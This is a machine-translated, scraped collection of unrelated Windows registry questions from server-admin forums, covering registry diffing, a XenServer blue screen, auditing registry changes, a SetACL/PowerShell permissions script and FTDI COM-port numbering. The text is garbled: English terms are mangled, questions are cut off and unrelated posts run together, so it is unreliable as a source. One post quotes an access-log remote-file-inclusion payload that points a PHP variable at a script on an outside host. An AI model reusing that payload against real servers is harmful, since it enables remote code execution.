有没有任何免费的工具来比较A点到B点的Windowsregistry? 我知道一些商业工具,但我正在寻找一个免费的实用程序。 现在我正考虑在运行一个实用程序之前和之后导出registry,这个实用程序会改变我们使用的工程工具的版本,然后比较.reg文件。 但是有没有免费的工具可以做到这一点?
我使用Citrix XenServer 5.5,并且在Windows Server 2008 R2 Guest上安装了Xentools 5.5,一年运行良好。 重新启动后,我们得到停止代码7B的BSOD,这是一个Citrix的PV驱动程序,我认为是一个问题,但我怎么能删除这个驱动程序没有GUI,安全模式也带来了蓝屏。 所以我在同一个虚拟机上安装第二个Windows Server,并且可以访问Guest虚拟机的文件系统。 在Windows / System32 /驱动程序中,我删除registry中的xenvbd.sys和scsifilt.sys我删除了我用xenvbd或scsifiltfind的所有东西,但蓝屏仍然在这里。 Windows Startuprepair和SFC / SCANNOW剂量帮助。 更新:所有已知的快照都具有相同的问题
曾经有Windows 2000资源工具包中的Regini.exe工具来执行此操作,但Microsoft不再支持它。 Reg.exe也不能做到这一点。 有任何想法吗?
我在运行Windows Server 2003 r2的ESXi上遇到虚拟机问题。 问题是每次启动并显示login窗口时,机器都会重新启动,不会有警告,也不会有警报,也不会有任何警报。 不pipe我做什么,我只需等待几秒钟,或者我可以login并尝试做一些事情,结果是一样的。 另一方面,如果我加载最后一个已知的良好configuration,则系统正常工作。 这里的事情是,我不能设置该configuration为默认的,因为在下一次重启,如果我select正常启动问题再次出现。 所有这些事实似乎都指向某种注册局的腐败行为。 值得知道这个服务器运行几个关键的应用程序,所以我必须通过这个问题。 服务器运行的关键应用程序是SIOPEL( http://www.siopel.com.ar/ ) 我也尝试重新安装Windows以修补registry。 这个问题已经解决了一段时间,但是当服务器投入使用后,问题又回来了。 所以在这一点上,我只能认为应用程序对于破坏整个系统的registry来说是一件非常糟糕的事情,或者也许是所有这些都是由Windows更新造成的; 我认为前者更可能。 接下来我尝试的是内核debugging。 我是内核debugging领域的新手,但是我觉得很奇怪,即使连接了内核debugging器,系统也会重新启动,除了加载的模块和其他一些线路,不知道是什么原因导致了这种行为。 我必须问,如果是驱动程序或故障服务,不应该在内核exception之后logging这些内容并打破它。 如果这是registry腐败, 好吧,这是场景,我想我现在必须做的是再次重新安装Windows,并开始跟踪和logging所有types的写入registry希望find一个线索。 我也认为这是服务器的应用程序之一,但我不知道哪一个,我也不能探测它。 有谁知道我该如何logging应用程序在registry中执行的所有活动? 任何types的build议或指导将非常感激。 提前致谢!
您好我想要的工具或审计策略,可以帮助我跟踪所有的变化对Windows服务器registry(包括谁做了更改 – 什么是旧的价值 – 什么是新的价值 – 改变types{删除 – 创build – 修改) 您的支持是高度赞赏
我正在尝试创build一个可以通过GPO分发到笔记本电脑(运行64位Windows 7 Professional)的启动脚本,以使任何用户(包括本地pipe理员)都无法显示连接的无线networking的密码。 我已经做了大部分,但不知道如何从密钥的安全条目中删除用户/组。 这是我到目前为止,它基本上定义variables并将密钥的所有权更改为本地“pipe理员”组。 $hkey = "HKEY_CLASSES_ROOT\AppID\{86F80216-5DD6-4F43-953B-35EF40A35AEE}" $exe = "\\server\share\SetACL.exe" & $exe -on $hkey -ot reg -actn setowner -ownr n:'Administrators' 脚本的最终结果应该从安全条目中删除“BUILTIN \ Administrators”,“BUILTIN \ Users”,“SERVICE \ TrustedInstaller”, 只保留具有读取权限的“BUILTIN \ SYSTEM” ,然后从SYSTEM获取权限并给予它们到BUILTIN \ Administrators。 这个configuration已经过testing和工作。 为了使用get-acl,你必须将ps-drive映射到hkcrconfiguration单元(因为它是一个指向{hklm,hkcu} \ SOFTWARE \ Classes的别名),所以我有这个,如果get-acl甚至需要删除权限: New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT $dkey = "HKCR:\AppID\{86F80216-5DD6-4F43-953B-35EF40A35AEE}" $acl = get-acl $dkey 我在互联网上发现了很多有关添加拒绝权限的信息,但是我不想添加拒绝信息,我只想删除条目,就好像点击属性>安全性中的“删除”一样。 […]
所以我最近浏览了我的网站访问日志,并注意到有几个尝试做这样的事情 ?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/…/cms/idf.txt?? 当然,我并不是完全愚蠢的,这对我的服务器或者软件没有任何影响,但是我认为它是这样的,我会看到那个域名上的实际情况。 当它加载时,Chrome试图根据Comodo更改registry项。 有没有什么办法可以从浏览器运行的代码中真正改变一个registry键值,或者是我第一次看到Chrome试图更改一个registry键值。 编辑:4次尝试修改HKLM / SYSTEM / ControlSet001 / Services / ESENT中的不同键
有没有一个registry项,我可以检查以确定服务器是否是只读域控制器?
我正在解决Windows 7中的caching凭据,特别是智能卡login,我想知道如何查找哪些用户当前在计算机上caching了凭据。 我读过如何cachingWindows凭据存储在本地计算机上? 并可以看到HKLM / Security / cacheregistry项,但它们只是散列值。
当生产使用FTDI USB到串行芯片与Windows主机进行通信的设备时,我们可以获得数百个COM端口,因为每当新的FTDI vid + pid +串行连接到PC时,Windows似乎只是增加了端口号。 我已经查看了HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\FTDIBUS并尝试删除出现的新条目,但唯一的影响是,即使对于具有相同vid + pid + serial的设备,COM端口号也会增加已连接一次)。 问题是否有可能以某种方式重置此计数器,以便枚举从第一个空闲COM端口号开始? 编辑:这个问题更适合superuser.com? 编辑2:它已经超级用户回答